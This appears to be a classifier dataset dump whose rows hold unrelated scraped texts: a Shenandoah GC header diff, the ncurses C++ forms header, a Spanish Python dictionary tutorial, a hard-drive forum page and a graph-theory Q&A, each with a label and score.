content
stringlengths
228
999k
pred_label
stringclasses
1 value
pred_score
float64
0.5
1
< prev index next > src/hotspot/share/gc/shenandoah/heuristics/shenandoahAdaptiveHeuristics.hpp Print this page @@ -1,7 +1,8 @@ /* * Copyright (c) 2018, 2019, Red Hat, Inc. All rights reserved. + * Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. @@ -23,12 +24,16 @@ */ #ifndef SHARE_GC_SHENANDOAH_HEURISTICS_SHENANDOAHADAPTIVEHEURISTICS_HPP #define SHARE_GC_SHENANDOAH_HEURISTICS_SHENANDOAHADAPTIVEHEURISTICS_HPP + #include "runtime/globals_extension.hpp" + #include "memory/allocation.hpp" #include "gc/shenandoah/heuristics/shenandoahHeuristics.hpp" + #include "gc/shenandoah/heuristics/shenandoahSpaceInfo.hpp" #include "gc/shenandoah/shenandoahPhaseTimings.hpp" + #include "gc/shenandoah/shenandoahSharedVariables.hpp" #include "utilities/numberSeq.hpp" class ShenandoahAllocationRate : public CHeapObj<mtGC> { public: explicit ShenandoahAllocationRate(); @@ -36,11 +41,10 @@ double sample(size_t allocated); double upper_bound(double sds) const; bool is_spiking(double rate, double threshold) const; - private: double instantaneous_rate(double time, size_t allocated) const; double _last_sample_time; @@ -48,22 +52,33 @@ double _interval_sec; TruncatedSeq _rate; TruncatedSeq _rate_avg; }; + /* + * The adaptive heuristic tracks the allocation behavior and average cycle + * time of the application. It attempts to start a cycle with enough time + * to complete before the available memory is exhausted. It errors on the + * side of starting cycles early to avoid allocation failures (degenerated + * cycles). + * + * This heuristic limits the number of regions for evacuation such that the + * evacuation reserve is respected. This helps it avoid allocation failures + * during evacuation. It preferentially selects regions with the most garbage. + */ class ShenandoahAdaptiveHeuristics : public ShenandoahHeuristics { public: - ShenandoahAdaptiveHeuristics(); + ShenandoahAdaptiveHeuristics(ShenandoahSpaceInfo* space_info); virtual ~ShenandoahAdaptiveHeuristics(); virtual void choose_collection_set_from_regiondata(ShenandoahCollectionSet* cset, RegionData* data, size_t size, size_t actual_free); void record_cycle_start(); - void record_success_concurrent(); + void record_success_concurrent(bool abbreviated); void record_success_degenerated(); void record_success_full(); virtual bool should_start_gc(); @@ -96,15 +111,16 @@ void adjust_last_trigger_parameters(double amount); void adjust_margin_of_error(double amount); void adjust_spike_threshold(double amount); + protected: ShenandoahAllocationRate _allocation_rate; // The margin of error expressed in standard deviations to add to our // average cycle time and allocation rate. As this value increases we - // tend to over estimate the rate at which mutators will deplete the + // tend to overestimate the rate at which mutators will deplete the // heap. In other words, erring on the side of caution will trigger more // concurrent GCs. double _margin_of_error_sd; // The allocation spike threshold is expressed in standard deviations. @@ -123,8 +139,10 @@ // Keep track of the available memory at the end of a GC cycle. This // establishes what is 'normal' for the application and is used as a // source of feedback to adjust trigger parameters. TruncatedSeq _available; + + size_t min_free_threshold(); }; #endif // SHARE_GC_SHENANDOAH_HEURISTICS_SHENANDOAHADAPTIVEHEURISTICS_HPP < prev index next >
__label__pos
0.723542
aboutsummaryrefslogtreecommitdiff path: root/contrib/ncurses/c++/cursesf.h blob: 1119f5cbc70a3fa698a0af5c39b9e66c4a00afac (plain) (blame) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 // * This makes emacs happy -*-Mode: C++;-*- /**************************************************************************** * Copyright (c) 1998 Free Software Foundation, Inc. * * * * Permission is hereby granted, free of charge, to any person obtaining a * * copy of this software and associated documentation files (the * * "Software"), to deal in the Software without restriction, including * * without limitation the rights to use, copy, modify, merge, publish, * * distribute, distribute with modifications, sublicense, and/or sell * * copies of the Software, and to permit persons to whom the Software is * * furnished to do so, subject to the following conditions: * * * * The above copyright notice and this permission notice shall be included * * in all copies or substantial portions of the Software. * * * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. * * IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, * * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR * * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR * * THE USE OR OTHER DEALINGS IN THE SOFTWARE. * * * * Except as contained in this notice, the name(s) of the above copyright * * holders shall not be used in advertising or otherwise to promote the * * sale, use or other dealings in this Software without prior written * * authorization. * ****************************************************************************/ /**************************************************************************** * Author: Juergen Pfeifer <[email protected]> 1997 * ****************************************************************************/ // $Id: cursesf.h,v 1.10 1999/05/16 17:31:42 juergen Exp $ #ifndef _CURSESF_H #define _CURSESF_H #include <cursesp.h> extern "C" { # include <form.h> } // // ------------------------------------------------------------------------- // The abstract base class for buitin and user defined Fieldtypes. // ------------------------------------------------------------------------- // class NCursesFormField; // forward declaration // Class to represent builtin field types as well as C++ written new // fieldtypes (see classes UserDefineFieldType... class NCursesFieldType { friend class NCursesFormField; protected: FIELDTYPE* fieldtype; inline void OnError(int err) const THROWS(NCursesFormException) { if (err!=E_OK) THROW(new NCursesFormException (err)); } NCursesFieldType(FIELDTYPE *f) : fieldtype(f) { } virtual ~NCursesFieldType() {} // Set the fields f fieldtype to this one. virtual void set(NCursesFormField& f) = 0; public: NCursesFieldType() : fieldtype((FIELDTYPE*)0) { } }; // // ------------------------------------------------------------------------- // The class representing a forms field, wrapping the lowlevel FIELD struct // ------------------------------------------------------------------------- // class NCursesFormField { friend class NCursesForm; protected: FIELD *field; // lowlevel structure NCursesFieldType* ftype; // Associated field type // Error handler inline void OnError (int err) const THROWS(NCursesFormException) { if (err != E_OK) THROW(new NCursesFormException (err)); } public: // Create a 'Null' field. Can be used to delimit a field list NCursesFormField() : field((FIELD*)0), ftype((NCursesFieldType*)0) { } // Create a new field NCursesFormField (int rows, int cols, int first_row = 0, int first_col = 0, int offscreen_rows = 0, int additional_buffers = 0) : ftype((NCursesFieldType*)0) { field = ::new_field(rows,cols,first_row,first_col, offscreen_rows, additional_buffers); if (!field) OnError(errno); } virtual ~NCursesFormField (); // Duplicate the field at a new position inline NCursesFormField* dup(int first_row, int first_col) { NCursesFormField* f = new NCursesFormField(); if (!f) OnError(E_SYSTEM_ERROR); else { f->ftype = ftype; f->field = ::dup_field(field,first_row,first_col); if (!f->field) OnError(errno); } return f; } // Link the field to a new location inline NCursesFormField* link(int first_row, int first_col) { NCursesFormField* f = new NCursesFormField(); if (!f) OnError(E_SYSTEM_ERROR); else { f->ftype = ftype; f->field = ::link_field(field,first_row,first_col); if (!f->field) OnError(errno); } return f; } // Get the lowlevel field representation inline FIELD* get_field() const { return field; } // Retrieve info about the field inline void info(int& rows, int& cols, int& first_row, int& first_col, int& offscreen_rows, int& additional_buffers) const { OnError(::field_info(field, &rows, &cols, &first_row, &first_col, &offscreen_rows, &additional_buffers)); } // Retrieve info about the fields dynamic properties. inline void dynamic_info(int& dynamic_rows, int& dynamic_cols, int& max_growth) const { OnError(::dynamic_field_info(field, &dynamic_rows, &dynamic_cols, &max_growth)); } // For a dynamic field you may set the maximum growth limit. // A zero means unlimited growth. inline void set_maximum_growth(int growth = 0) { OnError(::set_max_field(field,growth)); } // Move the field to a new position inline void move(int row, int col) { OnError(::move_field(field,row,col)); } // Mark the field to start a new page inline void new_page(bool pageFlag = FALSE) { OnError(::set_new_page(field,pageFlag)); } // Retrieve whether or not the field starts a new page. inline bool is_new_page() const { return ::new_page(field); } // Set the justification for the field inline void set_justification(int just) { OnError(::set_field_just(field,just)); } // Retrieve the fields justification inline int justification() const { return ::field_just(field); } // Set the foreground attribute for the field inline void set_foreground(chtype fore) { OnError(::set_field_fore(field,fore)); } // Retrieve the fields foreground attribute inline chtype fore() const { return ::field_fore(field); } // Set the background attribute for the field inline void set_background(chtype back) { OnError(::set_field_back(field,back)); } // Retrieve the fields background attribute inline chtype back() const { return ::field_back(field); } // Set the padding character for the field inline void set_pad_character(int pad) { OnError(::set_field_pad(field,pad)); } // Retrieve the fields padding character inline int pad() const { return ::field_pad(field); } // Switch on the fields options inline void options_on (Field_Options options) { OnError (::field_opts_on (field, options)); } // Switch off the fields options inline void options_off (Field_Options options) { OnError (::field_opts_off (field, options)); } // Retrieve the fields options inline Field_Options options () const { return ::field_opts (field); } // Set the fields options inline void set_options (Field_Options options) { OnError (::set_field_opts (field, options)); } // Mark the field as changed inline void set_changed(bool changeFlag = TRUE) { OnError(::set_field_status(field,changeFlag)); } // Test whether or not the field is marked as changed inline bool changed() const { return ::field_status(field); } // Return the index of the field in the field array of a form // or -1 if the field is not associated to a form inline int (index)() const { return ::field_index(field); } // Store a value in a fields buffer. The default buffer is nr. 0 inline void set_value(const char *val, int buffer = 0) { OnError(::set_field_buffer(field,buffer,val)); } // Retrieve the value of a fields buffer. The defaukt buffer is nr. 0 inline char* value(int buffer = 0) const { return ::field_buffer(field,buffer); } // Set the validation type of the field. inline void set_fieldtype(NCursesFieldType& f) { ftype = &f; f.set(*this); // A good friend may do that... } // Retrieve the validation type of the field. inline NCursesFieldType* fieldtype() const { return ftype; } }; // // ------------------------------------------------------------------------- // The class representing a form, wrapping the lowlevel FORM struct // ------------------------------------------------------------------------- // class NCursesForm : public NCursesPanel { protected: FORM* form; // the lowlevel structure private: NCursesWindow* sub; // the subwindow object bool b_sub_owner; // is this our own subwindow? bool b_framed; // has the form a border? bool b_autoDelete; // Delete fields when deleting form? NCursesFormField** my_fields; // The array of fields for this form // This structure is used for the form's user data field to link the // FORM* to the C++ object and to provide extra space for a user pointer. typedef struct { void* m_user; // the pointer for the user's data const NCursesForm* m_back; // backward pointer to C++ object const FORM* m_owner; } UserHook; // Get the backward pointer to the C++ object from a FORM static inline NCursesForm* getHook(const FORM *f) { UserHook* hook = (UserHook*)::form_userptr(f); assert(hook && hook->m_owner==f); return (NCursesForm*)(hook->m_back); } // This are the built-in hook functions in this C++ binding. In C++ we use // virtual member functions (see below On_..._Init and On_..._Termination) // to provide this functionality in an object oriented manner. static void frm_init(FORM *); static void frm_term(FORM *); static void fld_init(FORM *); static void fld_term(FORM *); // Calculate FIELD* array for the menu FIELD** mapFields(NCursesFormField* nfields[]); protected: // internal routines inline void set_user(void *user) { UserHook* uptr = (UserHook*)::form_userptr (form); assert (uptr && uptr->m_back==this && uptr->m_owner==form); uptr->m_user = user; } inline void *get_user() { UserHook* uptr = (UserHook*)::form_userptr (form); assert (uptr && uptr->m_back==this && uptr->m_owner==form); return uptr->m_user; } void InitForm (NCursesFormField* Fields[], bool with_frame, bool autoDeleteFields); inline void OnError (int err) const THROWS(NCursesFormException) { if (err != E_OK) THROW(new NCursesFormException (err)); } // this wraps the form_driver call. virtual int driver (int c) ; // 'Internal' constructor, builds an object without association to a // field array. NCursesForm( int lines, int cols, int begin_y = 0, int begin_x = 0) : NCursesPanel(lines,cols,begin_y,begin_x), form ((FORM*)0) { } public: // Create form for the default panel. NCursesForm (NCursesFormField* Fields[], bool with_frame=FALSE, // reserve space for a frame? bool autoDelete_Fields=FALSE) // do automatic cleanup? : NCursesPanel() { InitForm(Fields, with_frame, autoDelete_Fields); } // Create a form in a panel with the given position and size. NCursesForm (NCursesFormField* Fields[], int lines, int cols, int begin_y, int begin_x, bool with_frame=FALSE, // reserve space for a frame? bool autoDelete_Fields=FALSE) // do automatic cleanup? : NCursesPanel(lines, cols, begin_y, begin_x) { InitForm(Fields, with_frame, autoDelete_Fields); } virtual ~NCursesForm(); // Set the default attributes for the form virtual void setDefaultAttributes(); // Retrieve current field of the form. inline NCursesFormField* current_field() const { return my_fields[::field_index(::current_field(form))]; } // Set the forms subwindow void setSubWindow(NCursesWindow& sub); // Set these fields for the form inline void setFields(NCursesFormField* Fields[]) { OnError(::set_form_fields(form,mapFields(Fields))); } // Remove the form from the screen inline void unpost (void) { OnError (::unpost_form (form)); } // Post the form to the screen if flag is true, unpost it otherwise inline void post(bool flag = TRUE) { OnError (flag ? ::post_form(form) : ::unpost_form (form)); } // Decorations inline void frame(const char *title=NULL, const char* btitle=NULL) { if (b_framed) NCursesPanel::frame(title,btitle); else OnError(E_SYSTEM_ERROR); } inline void boldframe(const char *title=NULL, const char* btitle=NULL) { if (b_framed) NCursesPanel::boldframe(title,btitle); else OnError(E_SYSTEM_ERROR); } inline void label(const char *topLabel, const char *bottomLabel) { if (b_framed) NCursesPanel::label(topLabel,bottomLabel); else OnError(E_SYSTEM_ERROR); } // ----- // Hooks // ----- // Called after the form gets repositioned in its window. // This is especially true if the form is posted. virtual void On_Form_Init(); // Called before the form gets repositioned in its window. // This is especially true if the form is unposted. virtual void On_Form_Termination(); // Called after the field became the current field virtual void On_Field_Init(NCursesFormField& field); // Called before this field is left as current field. virtual void On_Field_Termination(NCursesFormField& field); // Calculate required window size for the form. void scale(int& rows, int& cols) const { OnError(::scale_form(form,&rows,&cols)); } // Retrieve number of fields in the form. int count() const { return ::field_count(form); } // Make the page the current page of the form. void set_page(int page) { OnError(::set_form_page(form,page)); } // Retrieve current page number int page() const { return ::form_page(form); } // Switch on the forms options inline void options_on (Form_Options options) { OnError (::form_opts_on (form, options)); } // Switch off the forms options inline void options_off (Form_Options options) { OnError (::form_opts_off (form, options)); } // Retrieve the forms options inline Form_Options options () const { return ::form_opts (form); } // Set the forms options inline void set_options (Form_Options options) { OnError (::set_form_opts (form, options)); } // Are there more data in the current field after the data shown inline bool data_ahead() const { return ::data_ahead(form); } // Are there more data in the current field before the data shown inline bool data_behind() const { return ::data_behind(form); } // Position the cursor to the current field inline void position_cursor () { OnError (::pos_form_cursor (form)); } // Set the current field inline void set_current(NCursesFormField& F) { OnError (::set_current_field(form, F.field)); } // Provide a default key virtualization. Translate the keyboard // code c into a form request code. // The default implementation provides a hopefully straightforward // mapping for the most common keystrokes and form requests. virtual int virtualize(int c); // Operators inline NCursesFormField* operator[](int i) const { if ( (i < 0) || (i >= ::field_count (form)) ) OnError (E_BAD_ARGUMENT); return my_fields[i]; } // Perform the menu's operation // Return the field where you left the form. virtual NCursesFormField* operator()(void); // Exception handlers. The default is a Beep. virtual void On_Request_Denied(int c) const; virtual void On_Invalid_Field(int c) const; virtual void On_Unknown_Command(int c) const; }; // // ------------------------------------------------------------------------- // This is the typical C++ typesafe way to allow to attach // user data to a field of a form. Its assumed that the user // data belongs to some class T. Use T as template argument // to create a UserField. // ------------------------------------------------------------------------- template<class T> class NCursesUserField : public NCursesFormField { public: NCursesUserField (int rows, int cols, int first_row = 0, int first_col = 0, const T* p_UserData = (T*)0, int offscreen_rows = 0, int additional_buffers = 0) : NCursesFormField (rows, cols, first_row, first_col, offscreen_rows, additional_buffers) { if (field) OnError(::set_field_userptr(field,(void *)p_UserData)); } virtual ~NCursesUserField() {}; inline const T* UserData (void) const { return (const T*)::field_userptr (field); } inline virtual void setUserData(const T* p_UserData) { if (field) OnError (::set_field_userptr (field, (void *)p_UserData)); } }; // // ------------------------------------------------------------------------- // The same mechanism is used to attach user data to a form // ------------------------------------------------------------------------- // template<class T> class NCursesUserForm : public NCursesForm { protected: // 'Internal' constructor, builds an object without association to a // field array. NCursesUserForm( int lines, int cols, int begin_y = 0, int begin_x = 0, const T* p_UserData = (T*)0) : NCursesForm(lines,cols,begin_y,begin_x) { if (form) set_user ((void *)p_UserData); } public: NCursesUserForm (NCursesFormField Fields[], bool with_frame=FALSE, bool autoDelete_Fields=FALSE) : NCursesForm (Fields, with_frame, autoDelete_Fields) { }; NCursesUserForm (NCursesFormField Fields[], const T* p_UserData = (T*)0, bool with_frame=FALSE, bool autoDelete_Fields=FALSE) : NCursesForm (Fields, with_frame, autoDelete_Fields) { if (form) set_user ((void *)p_UserData); }; NCursesUserForm (NCursesFormField Fields[], int lines, int cols, int begin_y = 0, int begin_x = 0, const T* p_UserData = (T*)0, bool with_frame=FALSE, bool autoDelete_Fields=FALSE) : NCursesForm (Fields, lines, cols, begin_y, begin_x, with_frame, autoDelete_Fields) { if (form) set_user ((void *)p_UserData); }; virtual ~NCursesUserForm() { }; inline T* UserData (void) const { return (T*)get_user (); }; inline virtual void setUserData (const T* p_UserData) { if (form) set_user ((void *)p_UserData); } }; // // ------------------------------------------------------------------------- // Builtin Fieldtypes // ------------------------------------------------------------------------- // class Alpha_Field : public NCursesFieldType { private: int min_field_width; void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype,min_field_width)); } public: Alpha_Field(int width) : NCursesFieldType(TYPE_ALPHA), min_field_width(width) { } }; class Alphanumeric_Field : public NCursesFieldType { private: int min_field_width; void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype,min_field_width)); } public: Alphanumeric_Field(int width) : NCursesFieldType(TYPE_ALNUM), min_field_width(width) { } }; class Integer_Field : public NCursesFieldType { private: int precision; long lower_limit, upper_limit; void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype, precision,lower_limit,upper_limit)); } public: Integer_Field(int prec, long low=0L, long high=0L) : NCursesFieldType(TYPE_INTEGER), precision(prec), lower_limit(low), upper_limit(high) { } }; class Numeric_Field : public NCursesFieldType { private: int precision; double lower_limit, upper_limit; void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype, precision,lower_limit,upper_limit)); } public: Numeric_Field(int prec, double low=0.0, double high=0.0) : NCursesFieldType(TYPE_NUMERIC), precision(prec), lower_limit(low), upper_limit(high) { } }; class Regular_Expression_Field : public NCursesFieldType { private: char* regex; void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype,regex)); } public: Regular_Expression_Field(const char *expr) : NCursesFieldType(TYPE_REGEXP) { regex = new char[1+::strlen(expr)]; (strcpy)(regex,expr); } ~Regular_Expression_Field() { delete[] regex; } }; class Enumeration_Field : public NCursesFieldType { private: char** list; int case_sensitive; int non_unique_matches; void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype, list,case_sensitive,non_unique_matches)); } public: Enumeration_Field(char* enums[], bool case_sens=FALSE, bool non_unique=FALSE) : NCursesFieldType(TYPE_ENUM), list(enums), case_sensitive(case_sens?-1:0), non_unique_matches(non_unique?-1:0) { } }; class IPV4_Address_Field : public NCursesFieldType { private: void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype)); } public: IPV4_Address_Field() : NCursesFieldType(TYPE_IPV4) { } }; // // ------------------------------------------------------------------------- // Abstract base class for User-Defined Fieldtypes // ------------------------------------------------------------------------- // class UserDefinedFieldType : public NCursesFieldType { friend class UDF_Init; // Internal helper to set up statics private: // For all C++ defined fieldtypes we need only one generic lowlevel // FIELDTYPE* element. static FIELDTYPE* generic_fieldtype; protected: // This are the functions required by the low level libforms functions // to construct a fieldtype. static bool fcheck(FIELD *, const void*); static bool ccheck(int c, const void *); static void* makearg(va_list*); void set(NCursesFormField& f) { OnError(::set_field_type(f.get_field(),fieldtype,&f)); } protected: // Redefine this function to do a field validation. The argument // is a reference to the field you should validate. virtual bool field_check(NCursesFormField& f) = 0; // Redefine this function to do a character validation. The argument // is the character to be validated. virtual bool char_check (int c) = 0; public: UserDefinedFieldType() : NCursesFieldType(generic_fieldtype) { } }; // // ------------------------------------------------------------------------- // Abstract base class for User-Defined Fieldtypes with Choice functions // ------------------------------------------------------------------------- // class UserDefinedFieldType_With_Choice : public UserDefinedFieldType { friend class UDF_Init; // Internal helper to set up statics private: // For all C++ defined fieldtypes with choice functions we need only one // generic lowlevel FIELDTYPE* element. static FIELDTYPE* generic_fieldtype_with_choice; // This are the functions required by the low level libforms functions // to construct a fieldtype with choice functions. static bool next_choice(FIELD*, const void *); static bool prev_choice(FIELD*, const void *); protected: // Redefine this function to do the retrieval of the next choice value. // The argument is a reference to the field tobe examined. virtual bool next (NCursesFormField& f) = 0; // Redefine this function to do the retrieval of the previous choice value. // The argument is a reference to the field tobe examined. virtual bool previous(NCursesFormField& f) = 0; public: UserDefinedFieldType_With_Choice() { fieldtype = generic_fieldtype_with_choice; } }; #endif // _CURSESF_H
__label__pos
0.986353
Cómo eliminar un elemento de un diccionario Python Aliaksei Yursha 30 enero 2023 9 noviembre 2019 1. La sentencia del para eliminar el elemento del diccionario Python 2. La función dict.pop() para eliminar el elemento de diccionario Python 3. Borrar múltiples elementos de un diccionario Python 4. Características de rendimiento Cómo eliminar un elemento de un diccionario Python A veces tu diccionario Python contiene una o varias claves que quieres eliminar. Puedes hacerlo de varias maneras diferentes. La sentencia del para eliminar el elemento del diccionario Python Una aproximación es usar la sentencia del incorporada en Python. >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80} >>> del meal['fats'] >>> meal {'proteins': 10, 'carbohydrates': 80} Tenga en cuenta que si intenta eliminar un elemento mediante una clave que no está presente en el diccionario, El tiempo de ejecución de Python lanzará un KeyError. >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80} >>> del meal['water'] Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 'water' La función dict.pop() para eliminar el elemento de diccionario Python Otra aproximación es usar la función dict.pop(). La ventaja de este método es que le permite especificar el valor por defecto a devolver si la clave solicitada no existe en el diccionario. >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80} >>> meal.pop('water', 3000) 3000 >>> meal.pop('fats', 3000) 10 >>> meal {'proteins': 10, 'carbohydrates': 80} Tenga en cuenta que si no proporciona el valor predeterminado a devolver y el no existe, también obtendrá un error en tiempo de ejecución, como del arriba. >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80} >>> meal.pop('water') Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 'water' Borrar múltiples elementos de un diccionario Python Si necesita eliminar varios elementos de un diccionario de una sola vez, Python 3 ofrece un práctico listado de comprensiones, que puedes emplear para este propósito. >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80} >>> [meal.pop(key) for key in ['fats', 'proteins']] [10, 10] >>> meal {'carbohydrates': 80} Ten en cuenta que con el enfoque anterior, Python todavía se bloqueará si una de las claves pasadas no está en el diccionario. Para evitar este problema, puede dar un segundo argumento a dict.pop() como valor de retorno por defecto. >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80} >>> [meal.pop(key, None) for key in ['water', 'sugars']] [None, None] >>> meal {'fats': 10, 'proteins': 10, 'carbohydrates': 80} Características de rendimiento El uso de la sentencia del y dict.pop() tienen diferentes características de rendimiento. >>> from timeit import timeit >>> timeit("meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}; del meal['fats']") 0.12977536499965936 >>> timeit("meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}; meal.pop('fats', None)") 0.21620816600079706 Como se desprende de los tiempos anteriores, la sentencia del es casi el doble de rápida. Sin embargo, dict.pop() con un valor de reserva es más seguro ya que le ayudará a evitar errores en tiempo de ejecución. Utilice el primero si está seguro de que las claves deben estar presentes en el diccionario, y prefiera el segundo en caso contrario. Artículo relacionado - Python Dictionary
__label__pos
0.611092
1 • Initializing Hard Disk Drive I've placed an old hard drive in a USB external enclosure to rtrieve files. When I try to access the drive I get a message that the drive has not been initalized. How can I accomplish initializing the drive? GreggorF5 pointsBadges: • Create new SQL 2008 database in external drive My local server using SQL 2008 Express is running low on disk space. Is it possible to create new databases or move a database to an external drive? If so, how is it done, configuration wise? Thanks. HermanHermit15 pointsBadges: • External CD writer I have recently purchased a second hand memorex CD writer and although it looks in fine order and will play discs I cannot get it to copy/write/or burn discs. It is connected to my PC with a USB - Do I need a driver? or something. If so how do I go about this. Can anyone help please? Gemstone20 pointsBadges: • Connecting external hard drive to VM software What external hard drives are compatible with VM software? Ricopersaud145 pointsBadges: • Can a 4 bay external hard drive have different hard drive sizes? I have a "Mediasonic 3.5-Inch USB 2.0 and eSATA Pro Box 4-Bay Enclosure HF2-SU2S2" and it has 4 hard drive slots, can each hard drive be a different size or must they all be the same for it to operate. Im not trying to raid, I just want to access 4 hard drives with 1 connection. Addam30310 pointsBadges: • USB Disk Initialization Can anyone give me some tips or software ideas of how to initialize an external hard drive attached by USB? I have had 2 occasions, one with a brand new HD and one with a HD taken out of an old computer where Disk Management will show the drive as "unknown, Not Initialized" and you get the error... ConFlicker210 pointsBadges: • RAID 0 with an Internal and External Drive? I was wondering if I could be able to set up my default hard drive and a new external hard drive for RAID 0. My internal disk drive is a ST3160815AS ATA Device (149 GB, IDE). And I have a My Passport Essential 500 GB USB 2.0 Portable External Hard Drive WDBAAA5000AD6-NESN. Will I be able to have a... DrApocalypse5 pointsBadges: 1 Forgot Password No problem! Submit your e-mail address below. We'll send you an e-mail containing your password. Your password has been sent to: To follow this tag... There was an error processing your information. Please try again later. REGISTER or login: Forgot Password? By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Thanks! We'll email you when relevant content is added and updated. Following
__label__pos
0.714387
Take the 2-minute tour × Mathematics Stack Exchange is a question and answer site for people studying math at any level and professionals in related fields. It's 100% free, no registration required. Let $G$ be a graph such that $\forall$ $v$ $\in$ $V(G)$, $deg(v)$ $\geq$ $\frac{|V(G)|}{2}$ Let $p$ = $x_1x_2...x_k$ be a longest path in $G$. Show that $N(x_1)$ $\bigcup$ $N(x_k)$ $\subseteq$ {$x_1,...,x_k$}. What does $N(x_1)$ $\bigcup$ $N(x_k)$ mean in this context? It's not explained anywhere in notes or class. share|improve this question 1 Answer 1 up vote 3 down vote accepted It means the set of neighbors of the vertex: $N(x)=\{{ v\in V(G):\{v,x\}\in E(G)\}}$ share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.614679
